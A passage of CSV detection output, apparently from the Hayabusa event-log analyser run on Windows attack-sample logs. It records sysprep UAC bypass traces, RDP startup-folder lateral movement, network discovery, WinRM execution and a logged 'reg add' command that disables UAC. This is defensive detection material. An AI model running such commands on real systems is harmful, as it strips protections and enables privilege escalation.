C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2676 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2676 | PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 3964 | Tgt PGUID: 
365ABB72-28D0-5CDA-0000-0010F76F1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 3964 | PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.143 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 288 03573528 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3776 | PGUID: 365ABB72-28D3-5CDA-0000-0010B08B1300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,10,low,,Process 
Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 1020 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 1020 | PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2768 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 
11:32:51.470 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2768 | PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\explorer.exe | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 572 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 572 | PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 312 0197CDB0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3388 | PGUID: 365ABB72-28D3-5CDA-0000-001055AD1300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.814 +09:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13545 | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\cryptbase.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: Yokai Ltd. | Signed: false | Signature: Unavailable | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300 | Hash: SHA1=4DA0DCAD144039F6DD7739E37AB3A7B78FB86B4D,MD5=2BA4BC4753A29D56AA185C972CA1023E,SHA256=A6BE522A1FC48B391EFCB3A3CFE49560A455F1BB853505F7E9ACCA8EDF116B4C,IMPHASH=380A21A3D5988707B0CFE7CA5B1C7E0B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | LID: 0x13545 | PID: 3976 | PGUID: 365ABB72-28D3-5CDA-0000-001088C71300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 23:03:45.100 +09:00,alice.insecurebank.local,11,info,,File Created,Path: 
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09c49153\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.exe | Process: C:\Windows\system32\mstsc.exe | PID: 2580 | PGUID: ECAD0485-C903-5CDA-0000-0010340F1000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,C2,Hijack Legit RDP Session to Move Laterally,,../hayabusa-rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 23:04:06.339 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09cc920e\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 23:04:28.860 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09e09039\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: 
ECAD0485-CA56-5CDA-0000-00102DE71000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49583 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49584 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49586 (alice.insecurebank.local) | Dst: 10.59.4.24:445 (edward) | User: NT AUTHORITY\SYSTEM | Process: 
System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49587 (alice.insecurebank.local) | Dst: 10.59.4.21:445 (bob) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49588 (alice.insecurebank.local) | Dst: 10.59.4.22:445 (CHARLES) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49589 (alice.insecurebank.local) | Dst: 10.59.4.25:445 (FRED) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49590 (alice.insecurebank.local) | Dst: 10.59.4.11:445 (DC1) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49592 (alice.insecurebank.local) | Dst: 10.59.4.23:445 (dave) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49593 (alice.insecurebank.local) | Dst: 10.59.4.12:445 (DEV_SERVER) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:31:27.973 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_18_Invoke_UserHunter_NetSessionEnum_DC-srvsvc.evtx +2019-05-15 02:42:52.833 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-15 02:42:52.848 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 
DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-15 02:42:53.854 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49304 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-15 02:43:03.888 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49306 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-15 13:18:40.474 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - access to the VBA project object model in the Macro Settings changed | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3804 | PGUID: 365ABB72-92DF-5CDB-0000-0010A15E1300,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Evas,Office Security Settings Changed,,../hayabusa-rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,info,,Process 
Created,Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | Process: C:\Windows\System32\winrshost.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x12fe05 | PID: 3948 | PGUID: DFAE8213-BD78-5CDC-0000-0010C7FE1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /C ipconfig | Process: C:\Windows\System32\cmd.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | LID: 0x12fe05 | PID: 3136 | PGUID: DFAE8213-BD78-5CDC-0000-001091041300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: ipconfig | Process: C:\Windows\System32\ipconfig.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\cmd.exe /C ipconfig | LID: 0x12fe05 | PID: 1744 | PGUID: DFAE8213-BD78-5CDC-0000-001074051300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"Lateral Movement - Windows Remote Management | Cmd: ""C:\Windows\system32\HOSTNAME.EXE"" | Process: C:\Windows\System32\HOSTNAME.EXE | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\wsmprovhost.exe -Embedding | LID: 0x15daaf | PID: 2936 | PGUID: DFAE8213-BF0B-5CDC-0000-00105A951600 | Hash: 
SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,low,Disc,Suspicious Execution of Hostname,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_hostname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Exec,Remote PowerShell Session Host Process (WinRM),,../hayabusa-rules/sigma/process_creation/proc_creation_win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 22:10:13.760 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell CLM Setting Changed | DeleteValue: HKLM\System\CurrentControlSet\Control\SESSION MANAGER\Environment\__PSLockdownPolicy | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3580 | PGUID: DFAE8213-5B49-5CDD-0000-0010EE520500,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Powershell_CLM_Disabled_Sysmon_12.evtx +2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f | Process: C:\Windows\System32\reg.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x585e6 | PID: 3788 | PGUID: 
DFAE8213-70EB-5CDD-0000-0010F66D0A00 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | CreateKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,PrivEsc | Evas,Disable UAC Using Registry,,../hayabusa-rules/sigma/registry_event/win_re_disable_uac_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-17 01:08:30.516 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows 